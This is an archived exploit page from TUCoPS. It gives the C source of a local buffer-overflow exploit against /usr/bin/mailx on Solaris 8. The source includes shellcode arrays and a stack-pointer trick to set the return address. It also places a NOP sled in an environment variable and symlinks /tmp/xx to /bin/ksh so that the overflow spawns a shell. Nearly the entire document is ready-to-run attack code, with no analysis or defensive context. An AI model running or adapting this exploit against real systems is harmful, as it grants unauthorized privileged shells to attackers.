TUCoPS :: SunOS/Solaris :: sol8malx.c

Mailx Overflow - Solaris 8
 

/* /usr/bin/mailx overflow
I've tested it on Solaris 8
by Nemes||y -dkl- dragon@shellnow.it
*/

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

#define LEN 1150
#define offset 2075

/*-------------------------------------------------------------
char shellcode[] =
  "\xa0\x23\xa0\x10\xee\x23\xbf\xec\x82\x05\xe0\xd6\x90\x25\xe0\x0e\x92\x25\xe0\x0e\x94\x1c\x40\x11"
  "\x96\x1c\x40\x11\x98\x25\xe0\x0f\x91\xd0\x38\x08\xa4\x1a\x80\x08\xd2\x33\xbf\xf0\xac\x10\x27\xd1"
  "\xec\x33\xbf\xf2\xc0\x23\xbf\xf4\x82\x05\xe0\xd8\x90\x1a\xc0\x12\x92\x1a\xc0\x10\x94\x1a\xc0\x17"
  "\x91\xd0\x38\x08\x82\x05\xe0\xd9\x90\x1a\xc0\x12\x92\x25\xe0\x0b\x91\xd0\x38\x08\x82\x05\xe0\xda"
  "\x90\x1a\xc0\x12\x92\x1a\xc0\x10\x94\x23\xa0\x14\x91\xd0\x38\x08\xa6\x1a\xc0\x08\x82\x05\xe0\x2e"
  "\x90\x1a\xc0\x13\x92\x25\xe0\x07\x94\x1b\x80\x0e\x91\xd0\x38\x08\x90\x1a\xc0\x13\x92\x25\xe0\x07"
  "\x94\x02\xe0\x01\x91\xd0\x38\x08\x90\x1a\xc0\x13\x92\x25\xe0\x07\x94\x02\xe0\x02\x91\xd0\x38\x08"
  "\x90\x1b\x80\x0e\x82\x02\xe0\x17\x91\xd0\x38\x08\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xdc\xda"
  "\x90\x23\xa0\x10\x92\x23\xa0\x08\x94\x1b\x80\x0e\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
  "\x82\x02\xe0\x3b\x91\xd0\x38\x08\x90\x1b\x80\x0e\x82\x02\xe0\x01\x91\xd0\x38\x08";

 to get stackpointer...

 { __asm__("mov %sp,%i0 \n");}

---------------------------------------------------------------*/

/*-------------------------------------------------------------*/
char shellcode[]=
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";

unsigned long stackpointer(void)
{
  __asm__("movl %esp, %eax");
}
/*-------------------------------------------------------------*/
int main()
{

 long esp = stackpointer();
 unsigned char buf[LEN];
 char *envi;
 unsigned long magic = esp + offset;
 printf("\nSolaris Mailx Exploit - coded by Nemes||y -dkl-\n\n");
 printf(":: Stack Pointer -> 0x%x\n", esp);
 printf("::        Offset -> 0x%x\n", offset);
 printf("::   Return addr -> 0x%x\n\n", magic);
 envi = (char *)malloc(300*sizeof(char));
 memset(envi,0x90,300);
 memcpy(envi+280-strlen(shellcode),shellcode,strlen(shellcode));
 memcpy(envi,"SOR=",4);
 envi[299]=0; putenv(envi);
 symlink("/bin/ksh","/tmp/xx");
 memset(buf,0x41,1150); memcpy(buf+1116,&magic,4);
 buf[1149]=0;
 execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
/* EoF */

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH